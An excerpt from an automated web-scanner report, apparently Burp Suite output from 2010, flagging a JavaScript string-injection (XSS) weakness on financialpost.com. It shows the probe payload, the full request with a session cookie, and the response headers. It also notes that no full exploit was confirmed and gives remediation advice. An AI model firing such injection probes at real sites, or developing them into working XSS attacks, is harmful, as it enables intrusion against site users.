X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44021


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/retired%20forgotten/3953088/4833e';b4e5a632b37/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=retired%20forgotten;kw=3953088;kw=4833e';b4e5a632b37;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord
...[SNIP]...

1.257. http://www.financialpost.com/personal-finance/Warning+Asset+bubbles+underway/3976343/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /personal-finance/Warning+Asset+bubbles+underway/3976343/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13e57'%3bca94ef828cc was submitted in the REST URL parameter 1. This input was echoed as 13e57';ca94ef828cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /personal-finance13e57'%3bca94ef828cc/Warning+Asset+bubbles+underway/3976343/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82115
Expires: Sun, 19 Dec 2010 03:11:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.o